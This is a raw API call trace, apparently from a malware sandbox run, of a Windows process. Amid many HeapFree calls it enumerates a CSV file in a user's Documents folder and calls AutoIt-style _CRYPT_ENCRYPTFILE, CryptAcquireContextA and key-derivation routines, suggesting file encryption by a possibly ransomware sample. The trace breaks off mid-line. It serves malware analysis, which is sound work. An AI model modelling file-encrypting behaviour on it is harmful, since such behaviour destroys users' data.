1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.729] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.731] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.731] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.732] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.733] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.733] CloseHandle (hObject=0x258) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.733] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.737] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.738] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.739] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b476440, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0x6a510e20, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x6a510e20, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="HD2UssJoRg1BYp.csv", cAlternateFileName="HD2USS~1.CSV")) returned 0x41ac440 [0076.739] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.740] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.740] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.740] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0076.740] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.741] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797008, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.741] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.742] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.742] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.742] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.742] CharUpperBuffW (in: 